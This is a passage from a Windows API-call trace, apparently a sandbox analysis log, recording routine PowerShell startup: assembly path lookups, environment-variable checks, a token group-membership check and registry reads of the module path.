| out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0048.175] SetErrorMode (uMode=0x1) returned 0x1 [0048.175] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26db40 | out: lpFileInformation=0x26db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.176] SetErrorMode (uMode=0x1) returned 0x1 [0048.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.303] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.303] CoTaskMemFree (pv=0x1b852bb0) [0048.307] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.307] CoTaskMemFree (pv=0x1b852bb0) [0048.307] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.307] CoTaskMemFree (pv=0x1b852bb0) [0048.310] CoCreateGuid (in: pguid=0x26df08 | out: pguid=0x26df08*(Data1=0xd479a9f9, Data2=0x9dce, Data3=0x4428, Data4=([0]=0x83, [1]=0xe6, [2]=0x37, [3]=0xe4, [4]=0xdb, [5]=0x8f, [6]=0x18, [7]=0x97))) returned 0x0 [0048.314] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.314] CoTaskMemFree (pv=0x1b852bb0) [0048.317] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.317] CoTaskMemFree (pv=0x1b852bb0) [0048.319] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.319] CoTaskMemFree (pv=0x1b852bb0) [0048.324] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0048.325] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x26dbb0 | out: lpConsoleScreenBufferInfo=0x26dbb0) returned 1 [0048.329] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0048.329] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x26dbb0 | out: lpConsoleScreenBufferInfo=0x26dbb0) returned 1 [0048.332] GetCurrentProcess () returned 0xffffffffffffffff [0048.332] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x26dbd8 | out: TokenHandle=0x26dbd8*=0x324) returned 1 [0048.335] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26daf8 | out: TokenInformation=0x0, ReturnLength=0x26daf8) returned 0 [0048.335] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f6230 [0048.336] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x3f6230, TokenInformationLength=0x4, ReturnLength=0x26daf8 | out: TokenInformation=0x3f6230, ReturnLength=0x26daf8) returned 1 [0048.337] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26dc58 | out: phNewToken=0x26dc58*=0x320) returned 1 [0048.337] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26daf8 | out: TokenInformation=0x0, ReturnLength=0x26daf8) returned 0 [0048.337] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f6260 [0048.337] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x3f6260, TokenInformationLength=0x4, ReturnLength=0x26daf8 | out: TokenInformation=0x3f6260, ReturnLength=0x26daf8) returned 1 [0048.338] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2d56800*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26dc68 | out: IsMember=0x26dc68) returned 1 [0048.338] CloseHandle (hObject=0x320) returned 1 [0048.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.452] CoCreateGuid (in: pguid=0x26dd50 | out: pguid=0x26dd50*(Data1=0xbe875dc1, Data2=0xdddb, Data3=0x43f4, Data4=([0]=0x89, [1]=0x60, [2]=0x5b, [3]=0x7f, [4]=0x17, [5]=0xac, [6]=0xcb, [7]=0x6b))) returned 0x0 [0048.454] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.468] WinSqmIsOptedIn () returned 0x0 [0048.469] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.471] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.473] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.474] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.477] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.477] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.478] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.480] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.485] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.487] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0048.772] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.772] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0048.772] CoTaskMemFree (pv=0x1b852bb0) [0048.775] CoTaskMemFree (pv=0x49fea0) [0048.776] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d8c8 | out: phkResult=0x26d8c8*=0x328) returned 0x0 [0048.776] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d84c, lpData=0x0, lpcbData=0x26d848*=0x0 | out: lpType=0x26d84c*=0x2, lpData=0x0, lpcbData=0x26d848*=0x6c) returned 0x0 [0048.776] CoTaskMemAlloc (cb=0x70) returned 0x431b90 [0048.776] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d81c, lpData=0x431b90, lpcbData=0x26d818*=0x6c | out: lpType=0x26d81c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x26d818*=0x6c) returned 0x0 [0048.776] CoTaskMemFree (pv=0x431b90) [0048.776] CoTaskMemAlloc (cb=0xcc) returned 0x49fea0 [0048.777] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x49fea0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0048.777] CoTaskMemFree (pv=0x49fea0) [0048.777] CoTaskMemAlloc (cb=0xcc) returned 0x49fea0 [0048.777] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x49fea0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0048.777] CoTaskMemFree (pv=0x49fea0) [0048.779] RegCloseKey (hKey=0x328) returned 0x0 [0048.779] CoTaskMemAlloc (cb=0xcc) returned 0x49fea0 [0048.780] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x49fea0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0048.780] CoTaskMemFree (pv=0x49fea0) [0048.780] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d8c8 | out: phkResult=0x26d8c8*=0x328) returned 0x0 [0048.780] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d84c, lpData=0x0, lpcbData=0x26d848*=0x0 | out: lpType=0x26d84c*=0x0, lpData=0x0, lpcbData=0x26d848*=0x0) returned 0x2 [0048.780] RegCloseKey (hKey=0x328) returned 0x0 [0048.792] CoTaskMemAlloc (cb=0x20c) returned 0x43b140 [0048.792] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x43b140 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0048.793] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0048.798] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.799] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.806] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.806] CoTaskMemFree (pv=0x1b852bb0) [0048.806] CoTaskMemFree (pv=0x1b852bb0) [0048.813] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x26d6cc, lpData=0x0, lpcbData=0x26d6c8*=0x0 | out: lpType=0x26d6cc*=0x1, lpData=0x0, lpcbData=0x26d6c8*=0x74) returned 0x0 [0048.814] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x26d63c, lpData=0x0, lpcbData=0x26d638*=0x0 | out: lpType=0x26d63c*=0x1, lpData=0x0, lpcbData=0x26d638*=0x74) returned 0x0 [0048.814] CoTaskMemAlloc (cb=0x78) returned 0x431b90 [0048.814] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x26d60c, lpData=0x431b90, lpcbData=0x26d608*=0x74 | out: lpType=0x26d60c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d608*=0x74) returned 0x0 [0048.814] 